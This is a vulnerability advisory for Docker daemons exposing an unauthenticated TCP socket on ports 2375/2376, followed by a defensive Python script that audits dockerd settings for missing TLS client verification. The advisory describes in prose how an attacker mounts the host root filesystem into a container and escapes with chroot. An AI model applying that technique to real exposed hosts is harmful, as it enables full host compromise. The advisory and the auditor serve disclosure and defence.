vendor: Docker
by: Martin Pizala
CVSS: 7,5 HIGH
Unauthorized Access
CWE: 287
Product Name: Docker
Affected Version From: Since 0.4.7 (2013-06-28)
Affected Version To: Docker CE 17.06.0-ce and Docker Engine 1.13.1
Patch Exists: YES
Related CWE: None
CPE: a:docker:docker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2017
Docker Daemon – Unprotected TCP Socket
Through an unprotected Docker TCP socket (2375/tcp, or possibly 2376/tcp when TLS is enabled but without TLS authentication), an attacker can create a Docker container with the host server's '/' path mounted read/write and then use chroot to escape the container jail.
Mitigation:
Protect the TCP socket by using the command-line options provided by Docker.
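An added example, not part of the original advisory: a Python audit helper that flags dockerd TCP listeners configured without TLS client verification, the two exposed cases named in the description. It assumes the mitigation refers to dockerd's `--tlsverify` option (daemon.json key `tlsverify`); the function names, command lines and file paths are constructed for illustration.

```python
import json
import shlex

def parse_dockerd_args(cmdline):
    """Return (hosts, tls_flags) parsed from a dockerd command line."""
    hosts, flags = [], {"tls": False, "tlsverify": False}
    tokens = shlex.split(cmdline)
    i = 0
    while i < len(tokens):
        name, sep, value = tokens[i].partition("=")
        if name in ("-H", "--host"):
            if not sep and i + 1 < len(tokens):  # "-H tcp://..." form
                i += 1
                value = tokens[i]
            hosts.append(value)
        elif name in ("--tls", "--tlsverify"):
            # A bare switch means true; "--tlsverify=false" turns it off.
            flags[name[2:]] = (value.lower() != "false") if sep else True
        i += 1
    return hosts, flags

def parse_daemon_json(text):
    """Return (hosts, tls_flags) parsed from daemon.json content."""
    cfg = json.loads(text)
    flags = {k: bool(cfg.get(k, False)) for k in ("tls", "tlsverify")}
    return cfg.get("hosts", []), flags

def audit(hosts, flags):
    """List TCP listeners that accept clients without a verified certificate."""
    findings = []
    for host in hosts:
        # Only the tcp:// form is checked; unix:// and fd:// are local sockets.
        if not host.startswith("tcp://") or flags["tlsverify"]:
            continue
        reason = "TLS without client verification" if flags["tls"] else "no TLS"
        findings.append((host, reason))
    return findings

# Constructed sample configurations (not taken from the advisory).
SAMPLES = {
    "plain": "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375",
    "tls-only": "dockerd -H tcp://0.0.0.0:2376 --tls --tlscert=/etc/docker/server.pem --tlskey=/etc/docker/server-key.pem",
    "tlsverify": "dockerd -H tcp://0.0.0.0:2376 --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server.pem --tlskey=/etc/docker/server-key.pem",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, audit(*parse_dockerd_args(cmd)))
```

An empty result means every TCP listener requires a client certificate signed by the configured CA; any finding is a socket reachable in the way the description covers.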